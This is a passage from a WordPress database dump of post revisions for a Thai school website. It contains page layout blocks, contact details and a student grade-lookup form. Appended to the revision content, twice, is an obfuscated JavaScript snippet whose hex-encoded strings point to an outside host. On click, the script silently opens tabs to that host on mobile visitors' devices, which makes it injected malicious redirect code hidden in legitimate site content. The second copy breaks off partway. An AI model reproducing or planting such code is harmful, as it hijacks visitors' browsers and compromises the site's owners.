{\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#32e6a4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-01 21:09:45','2024-08-01 14:09:45','',14,'http://pakhaeng.ssk.in.th/?p=461',0,'revision','',0),
(463,1,'2024-08-01 21:10:51','2024-08-01 14:10:51','<!-- wp:buttons -->\n<div class=\"wp-block-buttons\"><!-- wp:button {\"backgroundColor\":\"light-green-cyan\",\"width\":100} -->\n<div class=\"wp-block-button has-custom-width wp-block-button__width-100\"><a class=\"wp-block-button__link has-light-green-cyan-background-color has-background wp-element-button\"><strong>ระบบดูคะแนน/เกรดนักเรียน</strong></a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:paragraph -->\n<p>การใช้งาน ให้</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<div align=\'center\'><form action=\'https://a3301.obec.expert/services\' method=\'POST\' target=\'_blank\' > <div><input name=\'idcard\' style=\'text-align:center;\' type=\'text\' value=\'\' placeholder=\'เลขบัตร ปชช. 13 หลัก\' /></div> <div><input name=\'schoolid\' type=\'hidden\' value=\'33010169\' required /><button type=\'submit\'>ค้นหา</button></div> </form></div>\n<!-- /wp:html -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const 